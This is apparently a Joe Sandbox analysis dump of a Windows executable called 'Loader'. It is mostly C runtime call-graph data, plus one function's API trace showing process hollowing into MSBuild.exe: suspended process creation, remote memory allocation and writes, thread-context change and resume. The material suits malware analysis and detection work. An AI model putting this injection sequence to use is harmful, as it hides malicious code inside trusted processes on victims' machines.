___scrt_is_nonwritable_in_current_image 22501->22502 22514 ec7594 EnterCriticalSection 22502->22514 22504 ecb557 22505 ecb279 __Getctype 14 API calls 22504->22505 22506 ecb56a 22505->22506 22515 ecb58a 22506->22515 22509->22497 22513 ec75ab LeaveCriticalSection 22510->22513 22512 ecb405 22512->22501 22513->22512 22514->22504 22518 ec75ab LeaveCriticalSection 22515->22518 22517 ecb26b 22517->22466 22518->22517 22536 ebd02a 22537 ebd036 __EH_prolog3_GS 22536->22537 22540 ebd088 22537->22540 22541 ebd0a2 22537->22541 22544 ebd050 22537->22544 22538 ebe76e std::_Throw_Cpp_error 5 API calls 22539 ebd179 22538->22539 22552 ebc960 22540->22552 22555 ec7d1d 22541->22555 22544->22538 22546 eb2c50 std::_Throw_Cpp_error 29 API calls 22546->22544 22547 ebd0c1 22548 ebd15e 22547->22548 22549 ebd198 22547->22549 22551 ec7d1d 45 API calls 22547->22551 22575 ebc4e3 22547->22575 22548->22546 22549->22548 22579 ec9277 22549->22579 22551->22547 22592 ec7ed8 22552->22592 22556 ec7d29 ___scrt_is_nonwritable_in_current_image 22555->22556 22557 ec7d4b 22556->22557 22558 ec7d33 22556->22558 22879 ec1d4e EnterCriticalSection 22557->22879 22559 ec6bb1 __strnicoll 14 API calls 22558->22559 22561 ec7d38 22559->22561 22563 ec729c __strnicoll 29 API calls 22561->22563 22562 ec7d56 22564 ece509 _Ungetc 29 API calls 22562->22564 22574 ec7d6e 22562->22574 22573 ec7d43 22563->22573 22564->22574 22565 ec7dfe 22880 ec7e36 22565->22880 22566 ec7dd6 22568 ec6bb1 __strnicoll 14 API calls 22566->22568 22570 ec7ddb 22568->22570 22569 ec7e04 22890 ec7e2e 22569->22890 22572 ec729c __strnicoll 29 API calls 22570->22572 22572->22573 22573->22547 22574->22565 22574->22566 22576 ebc517 22575->22576 22578 ebc4f3 22575->22578 22894 ebd85c 22576->22894 22578->22547 22580 ec9283 ___scrt_is_nonwritable_in_current_image 22579->22580 22581 ec929f 22580->22581 22582 ec928a 22580->22582 22932 ec1d4e EnterCriticalSection 22581->22932 22583 ec6bb1 __strnicoll 14 API calls 22582->22583 22585 ec928f 22583->22585 22588 ec729c __strnicoll 29 API calls 22585->22588 22586 ec92a9 22933 ec92ea 22586->22933 22590 ec929a 22588->22590 22590->22549 22593 ec7ee4 ___scrt_is_nonwritable_in_current_image 22592->22593 22594 ec7eeb 22593->22594 22595 ec7f02 22593->22595 22596 ec6bb1 __strnicoll 14 API calls 22594->22596 22605 ec1d4e EnterCriticalSection 22595->22605 22598 ec7ef0 22596->22598 22600 ec729c __strnicoll 29 API calls 22598->22600 22599 ec7f0e 22606 ec7f4f 22599->22606 22602 ebc96b 22600->22602 22602->22544 22605->22599 22607 ec7f6c 22606->22607 22608 ec7fd2 22606->22608 22609 ece509 _Ungetc 29 API calls 22607->22609 22610 ec8099 22608->22610 22612 ece509 _Ungetc 29 API calls 22608->22612 22611 ec7f72 22609->22611 22642 ec7f19 22610->22642 22666 ed37ef 22610->22666 22614 ece509 _Ungetc 29 API calls 22611->22614 22633 ec7f95 22611->22633 22615 ec7fe7 22612->22615 22618 ec7f7e 22614->22618 22616 ec800a 22615->22616 22619 ece509 _Ungetc 29 API calls 22615->22619 22616->22610 22617 ec8021 22616->22617 22620 ec7e72 43 API calls 22617->22620 22624 ece509 _Ungetc 29 API calls 22618->22624 22618->22633 22621 ec7ff3 22619->22621 22623 ec802a 22620->22623 22621->22616 22627 ece509 _Ungetc 29 API calls 22621->22627 22623->22642 22657 ec1eb5 22623->22657 22626 ec7f8a 22624->22626 22625 ec7fb0 22625->22642 22646 ec7e72 22625->22646 22630 ece509 _Ungetc 29 API calls 22626->22630 22628 ec7fff 22627->22628 22631 ece509 _Ungetc 29 API calls 22628->22631 22630->22633 22631->22616 22633->22608 22633->22625 22634 ec806c 22662 ece39f 22634->22662 22636 ec7e72 43 API calls 22638 ec8053 22636->22638 22637 ec8080 22640 ec6bb1 __strnicoll 14 API calls 22637->22640 22637->22642 22638->22634 22639 ec8059 22638->22639 22641 ec9277 31 API calls 22639->22641 22640->22642 22641->22642 22643 ec7f47 22642->22643 22878 ec1d62 LeaveCriticalSection 22643->22878 22645 ec7f4d 22645->22602 22647 ec7e36 22646->22647 22648 ec7e57 22647->22648 22649 ec7e42 22647->22649 22650 ec7e66 22648->22650 22687 ed37e4 22648->22687 22651 ec6bb1 __strnicoll 14 API calls 22649->22651 22650->22625 22653 ec7e47 22651->22653 22655 ec729c __strnicoll 29 API calls 22653->22655 22656 ec7e52 22655->22656 22656->22625 22658 ecafb3 __Getctype 39 API calls 22657->22658 22659 ec1ec0 22658->22659 22660 ecb596 __Getctype 39 API calls 22659->22660 22661 ec1ed0 22660->22661 22661->22634 22661->22636 22663 ece3b2 _Fputc 22662->22663 22845 ece3d6 22663->22845 22665 ece3c4 _Fputc 22665->22637 22667 ed3989 22666->22667 22668 ed3998 22667->22668 22672 ed39ad 22667->22672 22669 ec6bb1 __strnicoll 14 API calls 22668->22669 22670 ed399d 22669->22670 22671 ec729c __strnicoll 29 API calls 22670->22671 22673 ed39a8 22671->22673 22672->22673 22674 ed3a0b 22672->22674 22675 ed512f _Ungetc 14 API calls 22672->22675 22673->22642 22676 ece509 _Ungetc 29 API calls 22674->22676 22675->22674 22677 ed3a3b 22676->22677 22678 ed8983 43 API calls 22677->22678 22679 ed3a43 22678->22679 22679->22673 22680 ece509 _Ungetc 29 API calls 22679->22680 22681 ed3a7d 22680->22681 22681->22673 22682 ece509 _Ungetc 29 API calls 22681->22682 22683 ed3a8b 22682->22683 22683->22673 22684 ece509 _Ungetc 29 API calls 22683->22684 22685 ed3a99 22684->22685 22686 ece509 _Ungetc 29 API calls 22685->22686 22686->22673 22688 ed37fa 22687->22688 22689 ed3807 22688->22689 22693 ed381f 22688->22693 22690 ec6bb1 __strnicoll 14 API calls 22689->22690 22691 ed380c 22690->22691 22692 ec729c __strnicoll 29 API calls 22691->22692 22702 ec7e63 22692->22702 22694 ed387e 22693->22694 22693->22702 22708 ed512f 22693->22708 22695 ece509 _Ungetc 29 API calls 22694->22695 22697 ed3897 22695->22697 22713 ed8983 22697->22713 22700 ece509 _Ungetc 29 API calls 22701 ed38d0 22700->22701 22701->22702 22703 ece509 _Ungetc 29 API calls 22701->22703 22702->22625 22704 ed38de 22703->22704 22704->22702 22705 ece509 _Ungetc 29 API calls 22704->22705 22706 ed38ec 22705->22706 22707 ece509 _Ungetc 29 API calls 22706->22707 22707->22702 22709 ecc0e0 __Getctype 14 API calls 22708->22709 22710 ed514c 22709->22710 22711 ecad27 ___free_lconv_mon 14 API calls 22710->22711 22712 ed5156 22711->22712 22712->22694 22714 ed898f ___scrt_is_nonwritable_in_current_image 22713->22714 22715 ed8997 22714->22715 22719 ed89b2 22714->22719 22716 ec6bc4 __dosmaperr 14 API calls 22715->22716 22717 ed899c 22716->22717 22720 ec6bb1 __strnicoll 14 API calls 22717->22720 22718 ed89c9 22722 ec6bc4 __dosmaperr 14 API calls 22718->22722 22719->22718 22721 ed8a04 22719->22721 22742 ed389f 22720->22742 22723 ed8a0d 22721->22723 22724 ed8a22 22721->22724 22725 ed89ce 22722->22725 22726 ec6bc4 __dosmaperr 14 API calls 22723->22726 22743 ed2626 EnterCriticalSection 22724->22743 22728 ec6bb1 __strnicoll 14 API calls 22725->22728 22729 ed8a12 22726->22729 22734 ed89d6 22728->22734 22731 ec6bb1 __strnicoll 14 API calls 22729->22731 22730 ed8a28 22732 ed8a5c 22730->22732 22733 ed8a47 22730->22733 22731->22734 22744 ed8a9c 22732->22744 22735 ec6bb1 __strnicoll 14 API calls 22733->22735 22736 ec729c __strnicoll 29 API calls 22734->22736 22739 ed8a4c 22735->22739 22736->22742 22738 ed8a57 22807 ed8a94 22738->22807 22740 ec6bc4 __dosmaperr 14 API calls 22739->22740 22740->22738 22742->22700 22742->22702 22743->22730 22745 ed8aae 22744->22745 22746 ed8ac6 22744->22746 22748 ec6bc4 __dosmaperr 14 API calls 22745->22748 22747 ed8e08 22746->22747 22751 ed8b09 22746->22751 22750 ec6bc4 __dosmaperr 14 API calls 22747->22750 22749 ed8ab3 22748->22749 22752 ec6bb1 __strnicoll 14 API calls 22749->22752 22753 ed8e0d 22750->22753 22754 ed8b14 22751->22754 22758 ed8abb 22751->22758 22762 ed8b44 22751->22762 22752->22758 22755 ec6bb1 __strnicoll 14 API calls 22753->22755 22757 ec6bc4 __dosmaperr 14 API calls 22754->22757 22756 ed8b21 22755->22756 22760 ec729c __strnicoll 29 API calls 22756->22760 22759 ed8b19 22757->22759 22758->22738 22761 ec6bb1 __strnicoll 14 API calls 22759->22761 22760->22758 22761->22756 22763 ed8b5d 22762->22763 22764 ed8b98 22762->22764 22765 ed8b6a 22762->22765 22763->22765 22771 ed8b86 22763->22771 22768 ecad61 __strnicoll 15 API calls 22764->22768 22766 ec6bc4 __dosmaperr 14 API calls 22765->22766 22767 ed8b6f 22766->22767 22769 ec6bb1 __strnicoll 14 API calls 22767->22769 22772 ed8ba9 22768->22772 22773 ed8b76 22769->22773 22810 ed5dc4 22771->22810 22775 ecad27 ___free_lconv_mon 14 API calls 22772->22775 22776 ec729c __strnicoll 29 API calls 22773->22776 22774 ed8ce4 22777 ed8d58 22774->22777 22780 ed8cfd GetConsoleMode 22774->22780 22778 ed8bb2 22775->22778 22805 ed8b81 22776->22805 22779 ed8d5c ReadFile 22777->22779 22781 ecad27 ___free_lconv_mon 14 API calls 22778->22781 22782 ed8d74 22779->22782 22783 ed8dd0 GetLastError 22779->22783 22780->22777 22784 ed8d0e 22780->22784 22785 ed8bb9 22781->22785 22782->22783 22790 ed8d4d 22782->22790 22788 ed8ddd 22783->22788 22789 ed8d34 22783->22789 22784->22779 22791 ed8d14 ReadConsoleW 22784->22791 22786 ed8bde 22785->22786 22787 ed8bc3 22785->22787 22794 ed1720 31 API calls 22786->22794 22792 ec6bb1 __strnicoll 14 API calls 22787->22792 22793 ec6bb1 __strnicoll 14 API calls 22788->22793 22799 ec6bd7 __dosmaperr 14 API calls 22789->22799 22789->22805 22802 ed8d99 22790->22802 22803 ed8db0 22790->22803 22790->22805 22791->22790 22795 ed8d2e GetLastError 22791->22795 22797 ed8bc8 22792->22797 22798 ed8de2 22793->22798 22794->22771 22795->22789 22796 ecad27 ___free_lconv_mon 14 API calls 22796->22758 22800 ec6bc4 __dosmaperr 14 API calls 22797->22800 22801 ec6bc4 __dosmaperr 14 API calls 22798->22801 22799->22805 22800->22805 22801->22805 22819 ed8ea5 22802->22819 22803->22805 22832 ed9149 22803->22832 22805->22796 22844 ed2649 LeaveCriticalSection 22807->22844 22809 ed8a9a 22809->22742 22811 ed5dd1 22810->22811 22813 ed5dde 22810->22813 22812 ec6bb1 __strnicoll 14 API calls 22811->22812 22814 ed5dd6 22812->22814 22815 ed5dea 22813->22815 22816 ec6bb1 __strnicoll 14 API calls 22813->22816 22814->22774 22815->22774 22817 ed5e0b 22816->22817 22818 ec729c __strnicoll 29 API calls 22817->22818 22818->22814 22838 ed8ffc 22819->22838 22821 ecadaf __strnicoll MultiByteToWideChar 22822 ed8fb9 22821->22822 22826 ed8fc2 GetLastError 22822->22826 22829 ed8eed 22822->22829 22823 ed8f47 22830 ed8f01 22823->22830 22831 ed1720 31 API calls 22823->22831 22824 ed8f37 22827 ec6bb1 __strnicoll 14 API calls 22824->22827 22828 ec6bd7 __dosmaperr 14 API calls 22826->22828 22827->22829 22828->22829 22829->22805 22830->22821 22831->22830 22833 ed9183 22832->22833 22834 ed9214 22833->22834 22835 ed9219 ReadFile 22833->22835 22834->22805 22835->22834 22836 ed9236 22835->22836 22836->22834 22837 ed1720 31 API calls 22836->22837 22837->22834 22839 ed9030 22838->22839 22840 ed90a1 ReadFile 22839->22840 22841 ed8ebc 22839->22841 22840->22841 22842 ed90ba 22840->22842 22841->22823 22841->22824 22841->22829 22841->22830 22842->22841 22843 ed1720 31 API calls 22842->22843 22843->22841 22844->22809 22846 ece3ea 22845->22846 22854 ece3fa 22845->22854 22847 ece41f 22846->22847 22846->22854 22857 ec21e0 22846->22857 22849 ece430 22847->22849 22850 ece453 22847->22850 22863 ed7902 22849->22863 22852 ece4cf 22850->22852 22853 ece47b 22850->22853 22850->22854 22855 ecadaf __strnicoll MultiByteToWideChar 22852->22855 22853->22854 22856 ecadaf __strnicoll MultiByteToWideChar 22853->22856 22854->22665 22855->22854 22856->22854 22858 ec21f0 22857->22858 22866 ecb5f0 22858->22866 22874 ed9e83 22863->22874 22867 ec220d 22866->22867 22868 ecb607 22866->22868 22870 ecb621 22867->22870 22868->22867 22869 ecf695 __Getctype 39 API calls 22868->22869 22869->22867 22871 ec221a 22870->22871 22872 ecb638 22870->22872 22871->22847 22872->22871 22873 ecc912 __strnicoll 39 API calls 22872->22873 22873->22871 22877 ed9eb1 _Fputc 22874->22877 22875 ebba3f _ValidateLocalCookies 5 API calls 22876 ed791d 22875->22876 22876->22854 22877->22875 22878->22645 22879->22562 22881 ec7e57 22880->22881 22882 ec7e42 22880->22882 22883 ec7e66 22881->22883 22885 ed37e4 43 API calls 22881->22885 22884 ec6bb1 __strnicoll 14 API calls 22882->22884 22883->22569 22886 ec7e47 22884->22886 22887 ec7e63 22885->22887 22888 ec729c __strnicoll 29 API calls 22886->22888 22887->22569 22889 ec7e52 22888->22889 22889->22569 22893 ec1d62 LeaveCriticalSection 22890->22893 22892 ec7e34 22892->22573 22893->22892 22895 ebd910 22894->22895 22896 ebd880 22894->22896 22898 eb3240 std::_Throw_Cpp_error 30 API calls 22895->22898 22897 eb32c0 std::_Throw_Cpp_error 5 API calls 22896->22897 22899 ebd892 22897->22899 22900 ebd915 22898->22900 22905 eb34d0 22899->22905 22902 ebd89d _Yarn 22903 eb2e20 std::_Throw_Cpp_error 29 API calls 22902->22903 22904 ebd8de _Yarn 22902->22904 22903->22904 22904->22578 22906 eb34ef 22905->22906 22907 eb34e3 22905->22907 22908 eb350f 22906->22908 22909 eb34fc 22906->22909 22907->22902 22920 eb35c0 22908->22920 22912 eb3550 22909->22912 22913 eb356e 22912->22913 22914 eb3573 22912->22914 22923 eb35e0 22913->22923 22916 eb35c0 std::_Throw_Cpp_error 3 API calls 22914->22916 22917 eb357e 22916->22917 22919 eb358b 22917->22919 22927 ec72ac 22917->22927 22919->22907 22921 ebb9cb std::ios_base::_Init 3 API calls 22920->22921 22922 eb35d2 22921->22922 22922->22907 22924 eb35f8 std::ios_base::_Init 22923->22924 22925 ebf0bd Concurrency::cancel_current_task RaiseException 22924->22925 22926 eb360d 22925->22926 22928 ec74eb __strnicoll 29 API calls 22927->22928 22929 ec72bb 22928->22929 22930 ec72c9 __Getctype 11 API calls 22929->22930 22931 ec72c8 22930->22931 22932->22586 22934 ec9302 22933->22934 22936 ec9372 22933->22936 22935 ece509 _Ungetc 29 API calls 22934->22935 22940 ec9308 22935->22940 22937 ed512f _Ungetc 14 API calls 22936->22937 22938 ec92b7 22936->22938 22937->22938 22944 ec92e2 22938->22944 22939 ec935a 22941 ec6bb1 __strnicoll 14 API calls 22939->22941 22940->22936 22940->22939 22942 ec935f 22941->22942 22943 ec729c __strnicoll 29 API calls 22942->22943 22943->22938 22947 ec1d62 LeaveCriticalSection 22944->22947 22946 ec92e8 22946->22590 22947->22946 22997 ec1e3e 22998 ec7a0d ___scrt_uninitialize_crt 68 API calls 22997->22998 22999 ec1e46 22998->22999 23007 ecd5b7 22999->23007 23001 ec1e4b 23017 ecd662 23001->23017 23004 ec1e75 23005 ecad27 ___free_lconv_mon 14 API calls 23004->23005 23006 ec1e80 23005->23006 23008 ecd5c3 ___scrt_is_nonwritable_in_current_image 23007->23008 23021 ec7594 EnterCriticalSection 23008->23021 23010 ecd63a 23026 ecd659 23010->23026 23013 ecd60e DeleteCriticalSection 23015 ecad27 ___free_lconv_mon 14 API calls 23013->23015 23016 ecd5ce 23015->23016 23016->23010 23016->23013 23022 ec7865 23016->23022 23018 ec1e5a DeleteCriticalSection 23017->23018 23019 ecd679 23017->23019 23018->23001 23018->23004 23019->23018 23020 ecad27 ___free_lconv_mon 14 API calls 23019->23020 23020->23018 23021->23016 23023 ec7878 _Fputc 23022->23023 23029 ec7923 23023->23029 23025 ec7884 _Fputc 23025->23016 23101 ec75ab LeaveCriticalSection 23026->23101 23028 ecd646 23028->23001 23030 ec792f ___scrt_is_nonwritable_in_current_image 23029->23030 23031 ec795c 23030->23031 23032 ec7939 23030->23032 23039 ec7954 23031->23039 23040 ec1d4e EnterCriticalSection 23031->23040 23033 ec7445 __strnicoll 29 API calls 23032->23033 23033->23039 23035 ec797a 23041 ec7895 23035->23041 23037 ec7987 23055 ec79b2 23037->23055 23039->23025 23040->23035 23042 ec78c5 23041->23042 23043 ec78a2 23041->23043 23045 ec7a7b ___scrt_uninitialize_crt 64 API calls 23042->23045 23054 ec78bd 23042->23054 23044 ec7445 __strnicoll 29 API calls 23043->23044 23044->23054 23046 ec78dd 23045->23046 23047 ecd662 14 API calls 23046->23047 23048 ec78e5 23047->23048 23049 ece509 _Ungetc 29 API calls 23048->23049 23050 ec78f1 23049->23050 23058 ed2a87 23050->23058 23053 ecad27 ___free_lconv_mon 14 API calls 23053->23054 23054->23037 23100 ec1d62 LeaveCriticalSection 23055->23100 23057 ec79b8 23057->23039 23059 ec78f8 23058->23059 23060 ed2ab0 23058->23060 23059->23053 23059->23054 23061 ed2aff 23060->23061 23063 ed2ad7 23060->23063 23062 ec7445 __strnicoll 29 API calls 23061->23062 23062->23059 23065 ed2b2a 23063->23065 23066 ed2b36 ___scrt_is_nonwritable_in_current_image 23065->23066 23073 ed2626 EnterCriticalSection 23066->23073 23068 ed2b44 23069 ed2b75 23068->23069 23074 ed29e7 23068->23074 23087 ed2baf 23069->23087 23073->23068 23075 ed23dd _Fputc 29 API calls 23074->23075 23077 ed29f7 23075->23077 23076 ed29fd 23090 ed2447 23076->23090 23077->23076 23079 ed2a2f 23077->23079 23080 ed23dd _Fputc 29 API calls 23077->23080 23079->23076 23081 ed23dd _Fputc 29 API calls 23079->23081 23082 ed2a26 23080->23082 23083 ed2a3b CloseHandle 23081->23083 23084 ed23dd _Fputc 29 API calls 23082->23084 23083->23076 23085 ed2a47 GetLastError 23083->23085 23084->23079 23085->23076 23086 ed2a55 _Fputc 23086->23069 23099 ed2649 LeaveCriticalSection 23087->23099 23089 ed2b98 23089->23059 23091 ed24bd 23090->23091 23092 ed2456 23090->23092 23093 ec6bb1 __strnicoll 14 API calls 23091->23093 23092->23091 23098 ed2480 23092->23098 23094 ed24c2 23093->23094 23095 ec6bc4 __dosmaperr 14 API calls 23094->23095 23096 ed24ad 23095->23096 23096->23086 23097 ed24a7 SetStdHandle 23097->23096 23098->23096 23098->23097 23099->23089 23100->23057 23101->23028 24417 ecc717 24418 ecc72c ___scrt_is_nonwritable_in_current_image 24417->24418 24429 ec7594 EnterCriticalSection 24418->24429 24420 ecc733 24430 ed2588 24420->24430 24427 ecc862 2 API calls 24428 ecc751 24427->24428 24449 ecc777 24428->24449 24429->24420 24431 ed2594 ___scrt_is_nonwritable_in_current_image 24430->24431 24432 ed259d 24431->24432 24433 ed25be 24431->24433 24434 ec6bb1 __strnicoll 14 API calls 24432->24434 24452 ec7594 EnterCriticalSection 24433->24452 24436 ed25a2 24434->24436 24437 ec729c __strnicoll 29 API calls 24436->24437 24440 ecc742 24437->24440 24438 ed25f6 24460 ed261d 24438->24460 24440->24428 24443 ecc7ac GetStartupInfoW 24440->24443 24442 ed25ca 24442->24438 24453 ed24d8 24442->24453 24444 ecc7c9 24443->24444 24445 ecc74c 24443->24445 24444->24445 24446 ed2588 30 API calls 24444->24446 24445->24427 24447 ecc7f1 24446->24447 24447->24445 24448 ecc821 GetFileType 24447->24448 24448->24447 24464 ec75ab LeaveCriticalSection 24449->24464 24451 ecc762 24452->24442 24454 ecc0e0 __Getctype 14 API calls 24453->24454 24455 ed24ea 24454->24455 24457 ecbac7 6 API calls 24455->24457 24459 ed24f7 24455->24459 24456 ecad27 ___free_lconv_mon 14 API calls 24458 ed254c 24456->24458 24457->24455 24458->24442 24459->24456 24463 ec75ab LeaveCriticalSection 24460->24463 24462 ed2624 24462->24440 24463->24462 24464->24451

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00EE6110,00EE6100), ref: 00EE6334
                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00EE6347
                                                                                        • Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 00EE6365
                                                                                        • ReadProcessMemory.KERNELBASE(00000090,?,00EE6154,00000004,00000000), ref: 00EE6389
                                                                                        • VirtualAllocEx.KERNELBASE(00000090,?,?,00003000,00000040), ref: 00EE63B4
                                                                                        • WriteProcessMemory.KERNELBASE(00000090,00000000,?,?,00000000,?), ref: 00EE640C
                                                                                        • WriteProcessMemory.KERNELBASE(00000090,00400000,?,?,00000000,?,00000028), ref: 00EE6457
                                                                                        • WriteProcessMemory.KERNELBASE(00000090,?,?,00000004,00000000), ref: 00EE6495
                                                                                        • Wow64SetThreadContext.KERNEL32(0000009C,02350000), ref: 00EE64D1
                                                                                        • ResumeThread.KERNELBASE(0000009C), ref: 00EE64E0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                        • API String ID: 2687962208-3857624555
                                                                                        • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                        • Instruction ID: a9607cb95fe177f7bedc311124a55cf76f7294d3cd02a7a1ac97c20bd32a3e63
                                                                                        • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                        • Instruction Fuzzy Hash: 7AB1097264028AAFDB60CF69CC80BDA73A5FF88754F158124EA0CAB341D774FA51CB94

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 26 ecbd42-ecbd4e 27 ecbde0-ecbde3 26->27 28 ecbde9 27->28 29 ecbd53-ecbd64 27->29 30 ecbdeb-ecbdef 28->30 31 ecbd66-ecbd69 29->31 32 ecbd71-ecbd8a LoadLibraryExW 29->32 33 ecbd6f 31->33 34 ecbe09-ecbe0b 31->34 35 ecbd8c-ecbd95 GetLastError 32->35 36 ecbdf0-ecbe00 32->36 38 ecbddd 33->38 34->30 39 ecbdce-ecbddb 35->39 40 ecbd97-ecbda9 call ecf344 35->40 36->34 37 ecbe02-ecbe03 FreeLibrary 36->37 37->34 38->27 39->38 40->39 43 ecbdab-ecbdbd call ecf344 40->43 43->39 46 ecbdbf-ecbdcc LoadLibraryExW 43->46 46->36 46->39
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,C4C39003,?,00ECBE51,?,?,00000000), ref: 00ECBE03
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: api-ms-$ext-ms-
                                                                                        • API String ID: 3664257935-537541572
                                                                                        • Opcode ID: 82024604d199dd5cac31c9ad8ed3cf070c26331d34eebaf897184ee96ac08357
                                                                                        • Instruction ID: 00f14e50d429b98270f2e89d429598dc420375b191302aa854fb6704c3708126
                                                                                        • Opcode Fuzzy Hash: 82024604d199dd5cac31c9ad8ed3cf070c26331d34eebaf897184ee96ac08357
                                                                                        • Instruction Fuzzy Hash: 9C210871A01259ABD7219B66EE82F9A3B589B01764F241128FD17BB2D0E731ED06C6D0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleSize
                                                                                        • String ID:
                                                                                        • API String ID: 1378416451-0
                                                                                        • Opcode ID: f641986523fa2dc58d0f0dfaf051f26a3bb2b65ebaad19036c1dafc411d8bd86
                                                                                        • Instruction ID: f60a6dfef45cca3a45d4dcb6ffcf7d20f63dc491b343636dde45050403ba8def
                                                                                        • Opcode Fuzzy Hash: f641986523fa2dc58d0f0dfaf051f26a3bb2b65ebaad19036c1dafc411d8bd86
                                                                                        • Instruction Fuzzy Hash: 1071A0B0D04248CFCB00EFA8D59879EBBF0BF48314F508969E499AB380D734A949CF52

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 81 eba4d0-eba536 82 eba53c-eba54d 81->82 83 eba571-eba594 call eb4420 81->83 84 eba553-eba55f 82->84 85 eba565-eba56b 82->85 88 eba5ab-eba5c3 83->88 89 eba59a-eba5a6 83->89 84->85 85->83 91 eba5c9-eba5d9 88->91 92 eba61c 88->92 90 eba621-eba762 call ec8c30 call ec876d call ec8c30 call eb43a0 call eb4290 call eb43d0 call eb87f0 call eb8890 call eb8850 call eb43a0 call eb88b0 call eb43d0 call eb89c0 call eb8a10 89->90 124 eba798-eba79f 90->124 125 eba768-eba795 call ebb0e0 call eb8890 90->125 91->92 93 eba5df-eba5f0 91->93 92->90 95 eba60d-eba616 93->95 96 eba5f6-eba607 93->96 95->92 96->92 96->95 127 eba8c7-eba8e0 call eb1d10 call eb41a0 124->127 128 eba7a5-eba7ae 124->128 125->124 142 eba8fc-eba906 127->142 143 eba8e6-eba8f6 call eb41a0 127->143 129 eba7c5-eba7cb 128->129 130 eba7b4-eba7c0 128->130 133 eba7d1-eba7f1 call eb89f0 129->133 130->133 141 eba7f7-eba80b 133->141 144 eba84c-eba854 141->144 145 eba811-eba826 141->145 147 eba91c-eba936 call eb4420 142->147 143->142 159 eba90b-eba916 call eb41a0 143->159 150 eba85a-eba8c2 144->150 151 eba85f-eba8a8 call eb8a30 144->151 145->144 148 eba82c-eba846 145->148 157 ebaa28-ebaa32 147->157 158 eba93c-eba946 147->158 148->144 150->127 165 eba8ae-eba8b7 151->165 166 eba8bd 151->166 162 ebaa38-ebab21 call eb8890 call eb8bc0 call eb8b40 157->162 163 ebab26-ebabac call eb8890 call eb8bc0 157->163 158->157 161 eba94c-ebaa23 call eb8b40 call eb8890 call eb8bc0 158->161 159->147 183 ebabb4-ebac2a call eb8890 call eb8bc0 161->183 180 ebabaf 162->180 163->180 165->166 166->141 180->183 189 ebac2f-ebacd5 call eb4570 call eb8b40 call eb1dc0 call eb8c50 call ebba3f 183->189
                                                                                        APIs
                                                                                        Strings
